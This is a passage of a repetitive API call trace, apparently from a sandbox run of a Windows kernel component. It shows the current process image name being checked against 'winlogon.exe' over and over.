| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
